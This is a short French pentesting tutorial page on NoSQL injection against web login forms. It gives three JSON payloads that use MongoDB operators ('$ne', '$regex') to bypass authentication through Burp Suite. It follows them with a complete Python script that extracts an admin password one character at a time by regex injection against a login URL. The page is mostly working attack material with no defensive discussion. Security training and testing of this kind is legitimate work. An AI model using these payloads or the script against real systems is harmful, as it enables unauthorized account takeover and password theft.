NoSQL Injection - Pentesting Web

NoSQL manuel (avec BurpSuite)

Interceptons la demande avec Burpsuite lors de la session de connexion :

Nous pouvons envoyer une demande avec ce format où nous disons que nous connaissons dans ce cas l'utilisateur admin mais le mot de passe n'est pas connu et (ce n'est pas admin) :

{
  "username": "admin",
  "password": {
    "$ne": "admin"
  }
}

Nous pouvons envoyer une demande avec ce format où nous disons que nous ne connaissons ni le nom d'utilisateur ni le mot de passe :

{
  "username": {
    "$ne": "ThisUserDoesNotExist"
  },
  "password": {
    "$ne": "admin"
  }
}

Nous pouvons envoyer une demande avec cette "regex" et nous disons que nous savons comment commence l'utilisateur (dans ce cas, par la lettre a) :

{
  "username": {
    "$regex": "^a"
  },
  "password": {
    "$ne": "admin"
  }
}

Script Python :

Le script Python suivant automatisera tout le processus et est conçu pour trouver le mot de passe (nous supposons que l'utilisateur est connu) : il faudra personnaliser l'utilisateur et le lien du site Web dans le script selon chaque situation :

#!/usr/bin/python3

from pwn import *
import requests, time, sys, signal, string

def def_handler(sig, frame):
    print("\n\n[!] Sortie...\n")
    sys.exit(1)

# Ctrl + C
signal.signal(signal.SIGINT, def_handler)

# Variables globales
login_url = "http://localhost:4000/user/login"
characters = string.ascii_lowercase + string.ascii_uppercase + string.digits

def makeNoSQLI():

    password = ""

    p1 = log.progress("Brute force")
    p1.status("Lancement du processus de force brute")

    time.sleep(2)

    p2 = log.progress("Mot de passe")

    for position in range(0, 100):
        for character in characters:
            post_data = '{"username":"admin","password":{"$regex":"^%s%s"}}' % (password, character)
            p1.status(post_data)

            headers = {'Content-Type': 'application/json'}

            r = requests.post(login_url, headers=headers, data=post_data)

            if "Logged in as user" in r.text:
                password += character
                p2.status(password)
                break

if __name__ == '__main__':
    makeNoSQLI()

Mis à jour il y a 11 mois

Ce contenu vous a-t-il été utile ?